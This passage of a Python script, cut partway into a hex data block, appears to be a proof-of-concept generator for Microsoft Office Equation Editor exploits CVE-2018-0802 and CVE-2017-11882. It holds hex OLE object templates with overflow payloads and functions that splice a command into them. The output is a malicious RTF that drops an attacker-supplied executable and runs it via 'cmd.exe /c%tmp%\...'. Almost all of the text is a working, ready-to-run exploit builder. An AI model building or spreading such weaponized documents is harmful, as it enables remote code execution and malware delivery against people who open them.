CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E
30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000
00000000000000000000000000000000000000000000000000000000000000000000000000030004
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF01
000000000000007C010000040100003C0100000100090000039E00000002001C0000000000050000
0009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000
000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF000010000000C0FFFF
FFC6FFFFFF20020000660100000B00000026060F000C004D61746854797065000020001C000000FB
0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF5F
2D0A6500000A0000000000040000002D01000009000000320A6001100003000000202002004F006C
00650050007200650073003000300030000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000180002000300000005000000FFFFFFFF0000000000
00000000000000000000000000000000000000000000000000000000000000040000007E01000000
0000005200690063006800450064006900740046006C006100670073000000000000000000000000
0000000000000000000000000000000000000000000000000000001C000201FFFFFFFF06000000FF
FFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000A
0000000C000000000000004500710075006100740069006F006E0020004E00610074006900760065
000000000000000000000000000000000000000000000000000000000000000000000020000200FF
FFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000
000000000000000B000000C500000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000020000A00000026060F000A00FF
FFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D00
0048008A0100000A000600000048008A01FFFFFFFF6CE21800040000002D01010004000000F00100
000300000000000000000000000000000000000000000000004E414E490000000000000100000000
00000001000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000001C00000002009EC4A900000000000000C8A75C00C4
EE5B0000000000030100030A0A08000133C0508D44245250EB7F2020202020202020202020202020
20202020202020202020202020202020202020202020202020202020202020202020202020202020
20202020202020202020202020202020202020202020202020202020202020202020202020202020
202020202020202020202020202020202020202020202020202020202020202026908B44242C662D
51A8FFE0250000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550
494354007C010000FCFEFFFF4401000008007C01040100000100090000039E00000002001C000000
00000500000009020000000005000000020101000000050000000102FFFFFF00050000002E011800
0000050000000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF00001000
0000C0FFFFFFC6FFFFFF20020000660100000B00000026060F000C004D6174685479706500002000
1C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00
FEFFFFFF5F2D0A6500000A0000000000040000002D01000009000000320A60011000030000002020
20000A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC020000
00000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF6CE218000400
00002D01010004000000F0010000030000000000
"""
OBJDATA_TEMPLATE_11882 = R"""
01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
0000000000000000000000000000000000000000000000000000001400000000000000010043006f
006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
00000000000000000000000000000000000000000000000000000000000000010000006600000000
00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
00000000000000000000000000000000000000000000000000000000000000000000000000030004
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
414141414141414141414141414141414141414141120c4300000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000004500710075
006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
0000000000000000000000000000000000000000000000000000000000000004000000c500000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000ff
ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
7cef1800040000002d01010004000000f0010000030000000000
"""
def create_ole_exec_primitive(command, objdata_template, command_offset, max_len):
    if len(command) > max_len:
        raise ValueError("primitive command must be shorter than %d bytes" % max_len)
    hex_command = command.ljust(max_len).encode("hex")
    objdata_hex_stream = objdata_template.translate(None, "\r\n")
    ole_data = objdata_hex_stream[:command_offset] + hex_command + objdata_hex_stream[command_offset + len(hex_command):]
    return OBJECT_HEADER + ole_data + OBJECT_TRAILER


def create_rtf(header, trailer, executable, double):
    # CVE-2018-0802 exploit
    ole1 = create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_0802, (0xd12*2), 126)
    p = Package(executable)
    package = p.build_package()
    outbuf = header + package + ole1
    if double:
        # CVE-2017-11882 exploit
        outbuf += create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_11882, (0x949*2), 43)
    return outbuf + trailer


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="PoC for CVE-2018-0802 using Packager.dll file drop method")
    parser.add_argument("-e", "--executable", help="File to embed and exec", required=True)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
    parser.add_argument('-d', "--double", help="Double-whammy! Exploits both CVE-2018-0802 and CVE-2017-11882 in the same document.", action="store_true")
    args = parser.parse_args()
    with open(args.output, 'w') as f:
        f.write(create_rtf(RTF_HEADER, RTF_TRAILER, args.executable, args.double))
    print "[+] Completed!"